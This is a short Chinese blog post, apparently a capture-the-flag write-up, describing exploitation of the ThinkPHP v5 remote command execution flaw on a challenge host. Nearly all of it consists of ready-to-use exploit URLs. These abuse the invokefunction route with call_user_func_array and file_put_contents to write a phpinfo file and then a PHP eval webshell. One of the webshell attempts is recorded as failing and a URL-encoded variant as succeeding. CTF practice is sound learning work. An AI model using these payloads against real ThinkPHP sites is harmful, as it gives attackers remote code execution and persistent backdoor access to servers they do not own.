记一次webshell的问题

碰到一个web题打开网页后显示 thinkphp v5 这个版本有一个远程命令执行漏洞, 尝试写入phpinfo.php.

http://111.198.29.45:31300/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=echo "<?php phpinfo();?>" > info.php

写入成功

 

 

 写入webshell

http://111.198.29.45:31300/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=echo "<?php @eval($_POST['shell']); ?>"  > shell.php

一直不成功, 最后写入

http://111.198.29.45:31300/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=%3C?php%20eval($_REQUEST[%22shell%22]);?%3E

成功.

posted @ 2020-04-06 15:39  liuYGoo  阅读(394)  评论(0)    收藏  举报